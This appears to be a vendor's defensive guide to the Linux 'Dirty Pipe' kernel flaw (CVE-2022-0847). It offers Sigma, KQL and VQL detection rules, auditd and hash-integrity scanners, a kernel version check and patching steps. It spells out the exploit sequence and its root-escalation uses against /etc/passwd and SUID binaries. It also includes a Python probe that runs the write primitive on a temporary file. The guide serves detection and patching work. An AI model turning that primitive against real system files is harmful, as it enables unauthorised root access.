
CVE-2022-0847: Linux Kernel 'Dirty Pipe' Vulnerability — Detection and Remediation Guide

Security Arsenal Team
June 2, 2026

A high-severity vulnerability (CVSS 7.8) has been disclosed in the Linux kernel. It affects every release from 5.8 up to the fixed 5.10.102, 5.15.25 and 5.16.11 stable versions. Tracked as CVE-2022-0847 and dubbed "Dirty Pipe," the flaw lets an unprivileged local user write arbitrary bytes into the page cache of any file they can read, including read-only files and SUID-root binaries, which is enough for full system compromise (root access).

The missing initialization dates back to kernel 4.9, when splice() gained its pipe-backed iterator, but it only became exploitable in 5.8, when a new pipe-buffer flag changed how writes merge into existing buffers. The bug is most dangerous wherever untrusted users share a kernel: shared hosting, containerized deployments (containers share the host kernel, so a patched image does not help) and any multi-user Linux system. Defenders must prioritize patching immediately, as proof-of-concept (PoC) exploit code is public and reliable.

Technical Analysis

CVE Identifier: CVE-2022-0847
CVSS Score: 7.8 (High)
Affected Products: Linux kernel 5.8 and later, before 5.16.11, 5.15.25 and 5.10.102 (and distribution kernels that have not backported the fix).

Vulnerability Mechanics

The vulnerability is in how splice() hands page-cache pages to a pipe. Each slot in a pipe's ring is described by a struct pipe_buffer whose flags field records, among other things, whether a later write() may append into the buffer's page (PIPE_BUF_FLAG_CAN_MERGE, introduced in 5.8 to replace the earlier check on the buffer's ops pointer). When splice() pushed a file's page-cache page into the pipe, copy_page_to_iter_pipe() and push_pipe() filled in the new pipe_buffer without initializing flags, so a stale CAN_MERGE bit left over from an earlier anonymous write survived. The next pipe_write() trusted that flag and merged its data straight into the cached file page instead of allocating a fresh anonymous page. The upstream fix (commit 9d2231c5d74e) simply zeroes buf->flags in both functions.

An attacker can exploit this by:

  1. Creating a pipe and writing enough arbitrary data to fill every slot of its ring, so each slot is marked CAN_MERGE, then reading it all back. Draining frees the slots but does not clear their flags.
  2. Using the splice() system call to move at least one byte from the target file (any file the attacker can read, e.g. /etc/passwd or a SUID binary) into the pipe. The file's page-cache page now sits in a slot that still carries CAN_MERGE.
  3. Writing the payload to the pipe. Because the flag says the buffer may be merged into, the kernel copies the payload into the cached file page immediately after the spliced bytes.

The primitive has fixed limits that also shape detection: the attacker needs read permission on the file, the target offset cannot be on a page boundary (at least one byte of that page must be spliced first), a single write cannot cross a page boundary, and the file cannot be grown.

Impact

Because the write lands in the page cache, every process that reads the file sees the new bytes immediately. Nothing is written back to disk, however: the page is never marked dirty, so the file's on-disk contents and mtime are unchanged and the modification persists only until the page is evicted or the host reboots. That is still long enough for an attacker to:

  • Overwrite an existing line in /etc/passwd, for example replacing root's password field with a hash they know, then authenticate as root. (The write cannot grow the file, so a new entry has to fit over existing bytes.)
  • Overwrite the code of a SUID-root binary such as /usr/bin/su with a payload that spawns a root shell, then execute it. Several public PoCs restore the original bytes afterwards, so the tampered copy may exist only for seconds.

Exploitation Status

PoC exploits are publicly available and considered reliable. While no widespread active exploitation campaigns have been observed at the time of writing, the ease of exploitation and the high value of the target (root access) suggest threat actors will incorporate this rapidly into toolkits.

Detection & Response

The exploit is three ordinary system calls (pipe, splice and write) against a file the attacker can already read, so nothing about it looks like memory corruption and nothing is logged by default. Catching it live means auditing splice() itself (an auditd rule such as -a always,exit -F arch=b64 -S splice -F auid>=1000 -k dirtypipe) or an eBPF probe on the same path, and both are noisy on hosts where proxies such as HAProxy or Go network services use splice legitimately. The practical plan is to detect what surrounds it: the preparatory step of compiling a known exploit, the follow-on tampering with SUID binaries or /etc/passwd, and mismatches between the content processes actually read and what the package manager installed.

Sigma Rules

The rules below cover the two visible edges of an intrusion that uses this bug. Dirty Pipe itself rewrites file contents and never calls chmod, so the first rule does not see the exploit; it catches the permission change that commonly follows a successful escalation (a copied shell or helper given the SUID bit), and it fires on any such change in a system directory whatever the cause. chown is not included because it does not set the setuid bit (it clears it). The second rule catches the preparatory step: compiling source whose file name references the vulnerability. Both rules expect process-creation telemetry (auditd EXECVE records or an EDR agent) mapped to the Sigma Image and CommandLine fields.

YAML
---
title: Dirty Pipe - SUID Bit Set on System Binary
id: 4c0c5b8f-1f2e-4a3c-9b1d-0e5f6a7b8c9d
status: experimental
description: Detects chmod setting the setuid bit on a file under a system directory, a common follow-on to local privilege escalation such as CVE-2022-0847 (Dirty Pipe).
references:
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
author: Security Arsenal
date: 2022/03/01
tags:
  - attack.privilege_escalation
  - attack.t1068
  - attack.t1548.001
logsource:
  product: linux
  category: process_creation
detection:
  selection_chmod:
    Image|endswith: '/chmod'
  selection_suid:
    CommandLine|contains:
      - 'u+s'
      - 'ug+s'
      - 'a+s'
      - '4755'
      - '4555'
      - '6755'
  selection_path:
    CommandLine|contains:
      - '/usr/bin/'
      - '/usr/sbin/'
      - '/bin/'
      - '/sbin/'
      - '/lib/'
      - '/lib64/'
  condition: all of selection_*
falsepositives:
  - Package installation and legitimate system administration; baseline your configuration management tooling and exclude its process ancestry
level: high
---
title: Dirty Pipe - Exploit Compilation Activity
id: 9d1f2e3a-4b5c-6d7e-8f9a-0b1c2d3e4f5a
status: experimental
description: Detects a compiler or make invoked with a file name referencing the Dirty Pipe vulnerability (CVE-2022-0847) on a Linux endpoint.
references:
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
author: Security Arsenal
date: 2022/03/01
tags:
  - attack.privilege_escalation
  - attack.t1068
logsource:
  product: linux
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '/gcc'
      - '/cc'
      - '/clang'
      - '/make'
    CommandLine|contains:
      - 'dirty_pipe'
      - 'dirtypipe'
      - 'cve-2022-0847'
      - 'cve_2022_0847'
  condition: selection
falsepositives:
  - Security research or sanctioned testing; a renamed exploit source evades this rule, so treat it as cheap coverage rather than a control
level: critical
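To see the rule logic run against realistic input, here is an added example that is not part of the original advisory or of any Sigma tooling: a small Python scanner that parses auditd EXECVE records (the usual Linux source for process_creation telemetry), rebuilds argv including auditd's hex-encoded arguments, and applies both rules. The sample records are constructed, and the rule logic mirrors the YAML above (setuid bit via symbolic or octal mode, system-directory prefix, compiler plus exploit name) rather than calling a Sigma backend.

```python
"""Apply the two Dirty Pipe Sigma rules to auditd EXECVE records.

Added example for this guide; not part of the original advisory or of any
Sigma tooling. auditd emits one EXECVE record per exec with argv as a0..aN;
an argument containing whitespace or quotes is hex-encoded and written
without quotes, so the parser must decode both forms. The sample records
below are constructed, not captured from a real host.
"""
import os
import re
from typing import List, Optional, Tuple

# a<N>="literal"  or  a<N>=HEX (hex-encoded when the argument has special chars)
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/lib/", "/lib64/", "/usr/lib/")
# symbolic u+s, or a 4-digit octal mode whose leading digit carries the setuid bit (4-7)
SUID_MODE_RE = re.compile(r"u\+s|\b0?[4-7][0-7]{3}\b")
EXPLOIT_NAMES = ("dirty_pipe", "dirtypipe", "cve-2022-0847")
COMPILERS = ("gcc", "cc", "clang", "make")


def parse_execve(record: str) -> Optional[List[str]]:
    """Return argv from an auditd EXECVE record, or None for other record types."""
    if "type=EXECVE" not in record:
        return None
    argv = {}
    for m in ARG_RE.finditer(record):
        idx, literal, hexed = int(m.group(1)), m.group(2), m.group(3)
        argv[idx] = literal if literal is not None else bytes.fromhex(hexed).decode("utf-8", "replace")
    return [argv[i] for i in sorted(argv)]


def suid_on_system_binary(argv: List[str]) -> bool:
    """Rule 1: chmod that sets the setuid bit on a file under a system directory."""
    if not argv or os.path.basename(argv[0]) != "chmod":
        return False
    modes = [a for a in argv[1:] if not a.startswith("/")]
    targets = [a for a in argv[1:] if a.startswith(SYSTEM_DIRS)]
    return bool(targets) and any(SUID_MODE_RE.search(a) for a in modes)


def exploit_compilation(argv: List[str]) -> bool:
    """Rule 2: a compiler or make invoked with a Dirty Pipe related file name."""
    if not argv or os.path.basename(argv[0]) not in COMPILERS:
        return False
    return any(name in a.lower() for a in argv[1:] for name in EXPLOIT_NAMES)


def scan(records: List[str]) -> List[Tuple[str, List[str]]]:
    """Run both rules over raw auditd lines; return (rule name, argv) for each hit."""
    hits = []
    for rec in records:
        argv = parse_execve(rec)
        if argv is None:
            continue
        if suid_on_system_binary(argv):
            hits.append(("suid_on_system_binary", argv))
        if exploit_compilation(argv):
            hits.append(("exploit_compilation", argv))
    return hits


# Constructed sample records; timestamps and serials are made up.
SAMPLE_RECORDS = [
    'type=SYSCALL msg=audit(1646812800.101:3001): arch=c000003e syscall=59 success=yes exit=0 auid=1000 uid=1000 comm="chmod" exe="/usr/bin/chmod"',
    'type=EXECVE msg=audit(1646812800.101:3001): argc=3 a0="chmod" a1="u+s" a2="/usr/bin/find"',
    'type=EXECVE msg=audit(1646812800.205:3002): argc=3 a0="chmod" a1="755" a2="/home/alice/tool"',
    'type=EXECVE msg=audit(1646812800.310:3003): argc=3 a0="chown" a1="root:root" a2="/usr/bin/find"',
    # a3 is hex-encoded because the file name contains a space: "cve-2022-0847 poc.c"
    'type=EXECVE msg=audit(1646812800.417:3004): argc=4 a0="gcc" a1="-o" a2="poc" a3=6376652D323032322D3038343720706F632E63',
    'type=EXECVE msg=audit(1646812800.522:3005): argc=3 a0="chmod" a1="4755" a2="/usr/local/bin/backup"',
]

if __name__ == "__main__":
    for rule, argv in scan(SAMPLE_RECORDS):
        print(f"{rule}: {' '.join(argv)}")
```

Running it prints two hits: the chmod u+s on /usr/bin/find and the gcc build of a file named cve-2022-0847 poc.c, which only matches because the hex-encoded argument is decoded. The chmod 4755 under /usr/local/bin is deliberately not a hit; add that prefix to SYSTEM_DIRS if your baseline treats it as a system path.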

KQL (Microsoft Sentinel)

Hunt for chmod invocations that set the SUID bit on a system binary. This assumes exec telemetry (auditd EXECVE records or another process-creation log) is being forwarded into the Syslog table; the auth and authpriv facilities alone never record a chmod, so filtering on them returns nothing. The Syslog schema exposes HostIP rather than a SourceIP column. Hex-encoded EXECVE arguments (auditd uses them whenever an argument contains a space or quote) are not decoded by this query.

KQL — Microsoft Sentinel / Defender
// Hunt for chmod calls that set the setuid bit on a file under a system directory.
// Expects exec telemetry (e.g. auditd EXECVE records) to be present in the Syslog table.
Syslog
| where SyslogMessage has "chmod"
// symbolic u+s / ug+s / a+s, or a 4-digit octal mode whose first digit carries the setuid bit (4-7)
| where SyslogMessage matches regex @"(u\+s|ug\+s|a\+s|\b0?[4-7][0-7]{3}\b)"
| where SyslogMessage matches regex @"(/usr)?/(s?bin|lib(64)?)/"
| extend timestamp = TimeGenerated
| project timestamp, HostName, HostIP, Facility, ProcessName, SyslogMessage

Velociraptor VQL

Hunt for SUID binaries in system directories whose inode changed recently, and for exploit source or build artifacts in scratch and home directories. Keep the limitation in mind: a Dirty Pipe write changes only the cached page, so Mtime and Ctime do not move and the on-disk bytes are untouched. The first query therefore finds on-disk tampering and follow-on persistence, not the exploit write itself. For the page-cache change, compare the content that processes actually read against the package manager's recorded checksums (dpkg --verify on Debian and Ubuntu, rpm -Va on Red Hat); both read through the page cache and will flag the mismatch for as long as it persists.

VQL — Velociraptor
-- SUID binaries in system directories whose inode changed in the last 7 days.
-- Mode.String is the ls-style mode (e.g. -rwsr-xr-x); the 4th character is
-- 's' or 'S' when the setuid bit is set.
SELECT OSPath, Mode.String AS Mode, Size, Mtime, Ctime
FROM glob(globs=['/usr/bin/*', '/usr/sbin/*', '/bin/*', '/sbin/*'])
WHERE Mode.String =~ '^.{3}[sS]'
  AND Mtime > timestamp(epoch=now() - 7 * 24 * 3600)

-- Exploit source or build artifacts in scratch and home directories.
SELECT OSPath, Size, Mtime
FROM glob(globs=['/tmp/*', '/var/tmp/*', '/dev/shm/*', '/home/*/*'])
WHERE OSPath =~ '(?i)dirty.?pipe|cve.?2022.?0847'
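Because Mtime is useless against a page-cache-only change, the practical on-host check is a content hash against a trusted baseline, and a hash mismatch with unchanged size and mtime is itself the Dirty Pipe signature. The following Python is an added example, not code from the advisory or from Velociraptor: it baselines the setuid binaries under a directory, re-verifies them, and classifies each as ok, updated (hash and metadata moved, as a package update would) or cache_tampered. The demo() function builds throwaway files in a temporary directory and simulates the tamper by overwriting bytes in place and restoring mtime; that is a constructed stand-in, since a real Dirty Pipe write also leaves ctime and the on-disk bytes untouched, which a normal write cannot reproduce.

```python
"""Content-hash integrity check that catches page-cache-only tampering.

Added example for this guide; not code from the original advisory or from
Velociraptor. A Dirty Pipe write changes the bytes every reader sees but never
marks the page dirty, so size, mtime and the on-disk copy stay as they were.
The simulation in demo() is constructed: it edits a throwaway file and puts
mtime back, the only part of the real signature an ordinary write can mimic.
"""
import hashlib
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Baseline:
    sha256: str
    size: int
    mtime_ns: int


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suid(root: str) -> List[str]:
    """Regular files under root with the setuid bit set: the Dirty Pipe targets of interest."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return sorted(found)


def build_baseline(paths: Iterable[str]) -> Dict[str, Baseline]:
    """Record hash and inode metadata. On a real host take this from a known-good image."""
    base = {}
    for p in paths:
        st = os.stat(p)
        base[p] = Baseline(sha256_of(p), st.st_size, st.st_mtime_ns)
    return base


def verify(baseline: Dict[str, Baseline]) -> Dict[str, str]:
    """Classify each baselined file:
    ok              content unchanged
    missing         file gone
    updated         content changed and size or mtime moved (package update or on-disk tamper)
    cache_tampered  content changed while size and mtime are identical: the Dirty Pipe signature
    """
    verdicts = {}
    for p, b in baseline.items():
        if not os.path.exists(p):
            verdicts[p] = "missing"
            continue
        st = os.stat(p)
        if sha256_of(p) == b.sha256:
            verdicts[p] = "ok"
        elif st.st_size == b.size and st.st_mtime_ns == b.mtime_ns:
            verdicts[p] = "cache_tampered"
        else:
            verdicts[p] = "updated"
    return verdicts


def simulate_cache_tamper(path: str, offset: int, payload: bytes) -> None:
    """Stand-in for the exploit's write: overwrite bytes in place without growing the file
    (Dirty Pipe cannot extend a file either), then restore mtime so the inode looks untouched."""
    st = os.stat(path)
    with open(path, "r+b") as f:
        f.seek(offset)
        f.write(payload)
    os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))


def demo() -> Dict[str, str]:
    """Build throwaway setuid files, baseline them, tamper, and return verdicts keyed by name."""
    with tempfile.TemporaryDirectory() as root:
        victim, control, updated = (os.path.join(root, n) for n in ("su", "passwd", "sudo"))
        for p in (victim, control, updated):
            with open(p, "wb") as f:
                f.write(b"\x7fELF" + b"\x00" * 60 + b"original code bytes")
            os.chmod(p, 0o4755)
        plain = os.path.join(root, "notes.txt")            # no setuid bit, must not be baselined
        with open(plain, "wb") as f:
            f.write(b"not interesting")
        base = build_baseline(find_suid(root))
        simulate_cache_tamper(victim, 64, b"shellcode")    # same size, same mtime, new bytes
        with open(updated, "ab") as f:                     # a real update changes size and mtime
            f.write(b" rebuilt")
        return {os.path.basename(p): v for p, v in verify(base).items()}


if __name__ == "__main__":
    print(demo())
```

On a real host you would feed find_suid('/usr') to build_baseline on a known-good image, or skip the local baseline and compare against the package manager's checksums with dpkg --verify or rpm -Va, and run the check on a schedule short enough to beat a PoC that restores the original bytes after use.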

Remediation Script (Bash)

Use this Bash script to compare the running kernel's upstream version against the affected range. Treat its answer as a first pass: distributions backport the fix without bumping the upstream version string, and heavily patched enterprise kernels can carry the affected code under an older version string, so both a "may be vulnerable" and a "safe" result are only confirmed by the vendor's advisory or package changelog.

Bash / Shell
#!/bin/bash
# CVE-2022-0847 (Dirty Pipe) kernel version check.
# Fixed upstream in 5.16.11, 5.15.25, 5.10.102 and in 5.17+. The 5.8, 5.9 and
# 5.11-5.14 series were end-of-life upstream and only received the fix through
# distribution backports, which do not change the upstream version string.
set -u

echo "Checking kernel version for CVE-2022-0847 (Dirty Pipe)..."

# Keep the upstream major.minor[.patch] part of uname -r (5.15.0-25-generic -> 5.15.0).
KERNEL_VERSION=$(uname -r | sed -E 's/^([0-9]+\.[0-9]+(\.[0-9]+)?).*/\1/')
MAJOR_MINOR=$(echo "$KERNEL_VERSION" | cut -d. -f1,2)
echo "Current kernel version: $KERNEL_VERSION"

# version_ge A B: true when A >= B under natural version ordering.
version_ge() { [ "$(printf '%s\n' "$1" "$2" | sort -V | head -n 1)" = "$2" ]; }

if ! version_ge "$KERNEL_VERSION" "5.8"; then
    echo "[SAFE] Upstream version is older than 5.8; the vulnerable merge path does not exist."
    echo "Caveat: vendor kernels with an old base version may carry backported pipe code; check the advisory."
    exit 0
fi

FIXED=0
case "$MAJOR_MINOR" in
    5.10) version_ge "$KERNEL_VERSION" "5.10.102" && FIXED=1 ;;
    5.15) version_ge "$KERNEL_VERSION" "5.15.25"  && FIXED=1 ;;
    5.16) version_ge "$KERNEL_VERSION" "5.16.11"  && FIXED=1 ;;
    *)    version_ge "$KERNEL_VERSION" "5.17"     && FIXED=1 ;;
esac

if [ "$FIXED" -eq 1 ]; then
    echo "[SAFE] Upstream version $KERNEL_VERSION includes the fix."
else
    echo "[WARNING] Upstream version $KERNEL_VERSION is in the affected range; the fix may still be backported."
    echo "Confirm against the vendor changelog, for example:"
    echo "  Debian/Ubuntu: zcat /usr/share/doc/linux-image-$(uname -r)/changelog.Debian.gz | grep -c CVE-2022-0847"
    echo "  RHEL/CentOS:   rpm -q --changelog kernel | grep -c CVE-2022-0847"
    echo "If the CVE is not listed, update to 5.16.11+, 5.15.25+, 5.10.102+ or 5.17+ and reboot."
fi
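Version strings cannot settle the question on a distribution kernel, so a runtime probe is the check that actually answers it. The following Python is an added example, not taken from the advisory or from a published PoC: it performs the three-step sequence from the Vulnerability Mechanics section (fill and drain a pipe, splice one byte of a file into it, write a payload) against a temporary file the caller owns, then reads the file back to see whether the payload landed in the cached page. It crosses no privilege boundary, since the caller could write that file anyway, and it assumes Python 3.10 or newer for os.splice and fcntl.F_GETPIPE_SZ; anything else makes it report None rather than guess.

```python
"""Runtime self-check for CVE-2022-0847 against a temporary file the caller owns.

Added example for this guide; not taken from the advisory or from a published
PoC. It gains nothing (the caller can already write the file); it only reports
whether the running kernel still merges a pipe write into a spliced page-cache
page. Needs Python 3.10+ for os.splice and fcntl.F_GETPIPE_SZ; returns None
when the probe cannot run.
"""
import fcntl
import os
import tempfile
from typing import Optional

F_GETPIPE_SZ = getattr(fcntl, "F_GETPIPE_SZ", 1032)   # 1032 is the Linux value
PAGE = 4096


def probe_dirty_pipe() -> Optional[bool]:
    """True  -> vulnerable: the payload landed in the file's cached page
    False -> the kernel allocated a fresh pipe page, as a fixed kernel does
    None  -> probe unavailable (no os.splice, or the syscall is blocked)"""
    if not hasattr(os, "splice"):
        return None
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"A" * PAGE)            # one full page of known content
        path = tmp.name
    r, w = os.pipe()
    fd = os.open(path, os.O_RDONLY)
    try:
        # Step 1: fill every slot of the pipe ring with anonymous data so each
        # pipe_buffer gets PIPE_BUF_FLAG_CAN_MERGE, then drain it. The slots
        # are free again but (on a vulnerable kernel) the flags are not cleared.
        size = fcntl.fcntl(w, F_GETPIPE_SZ)
        os.write(w, b"\x00" * size)
        left = size
        while left:
            left -= len(os.read(r, left))
        # Step 2: splice one byte of the file into the pipe. The file's cached
        # page now occupies a slot that may still carry the stale flag.
        os.splice(fd, w, 1, offset_src=0)
        # Step 3: write a payload. A vulnerable kernel merges it into the cached
        # file page at offset 1; a fixed kernel puts it into a new pipe page.
        payload = b"B" * 8
        os.write(w, payload)
        with open(path, "rb") as f:
            return f.read(len(payload) + 1)[1:] == payload
    except OSError:
        return None
    finally:
        os.close(fd)
        os.close(r)
        os.close(w)
        os.unlink(path)


if __name__ == "__main__":
    result = probe_dirty_pipe()
    print({True: "VULNERABLE", False: "not vulnerable", None: "probe unavailable"}[result])
```

Run it under the lowest-privilege account available. A True result on a system whose version check said SAFE means the vendor kernel carries the affected code; a False result on a kernel in the affected upstream range means the fix was backported.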

Remediation

Patching

The most effective remediation is to update the Linux kernel to a release containing the fix. The patch was merged upstream and shipped in the stable releases of February 23, 2022, ahead of public disclosure on March 7, 2022, and has been backported to the supported long-term kernels. Series that were already end-of-life upstream (5.8, 5.9 and 5.11 through 5.14) never received an upstream fix; systems on those series depend on their distribution's backport or on moving to a supported series.

Patched Versions (Minimum):

  • 5.16.x: Upgrade to 5.16.11 or later.
  • 5.15.x: Upgrade to 5.15.25 or later.
  • 5.10.x: Upgrade to 5.10.102 or later.
  • 5.17 and newer: fixed before release.

Vendor Actions

Major distributions have released updates. Apply patches immediately:

  • Ubuntu: Run sudo apt update && sudo apt install linux-image-generic, or the HWE package you actually boot (for example linux-image-generic-hwe-20.04). On 20.04 the GA 5.4 kernel predates the bug; the HWE kernel does not, so make sure the HWE package is the one being updated.
  • Red Hat / CentOS / RHEL: Run sudo yum update kernel or sudo dnf update kernel.
  • Debian: Run sudo apt-get update && sudo apt-get install linux-image-amd64.

Verification

After patching, reboot; the running kernel is only replaced by a reboot or a livepatch, and uptime tells you whether that happened. Then check uname -r. On distributions that backport fixes the version string will not reach the upstream numbers above, so confirm instead that the installed kernel package version matches the one named in the vendor's advisory (apt changelog or rpm -q --changelog for the package, grepping for CVE-2022-0847). The reboot also evicts any page-cache modification made before the patch, so post-patch integrity checks of SUID binaries start from a clean state.
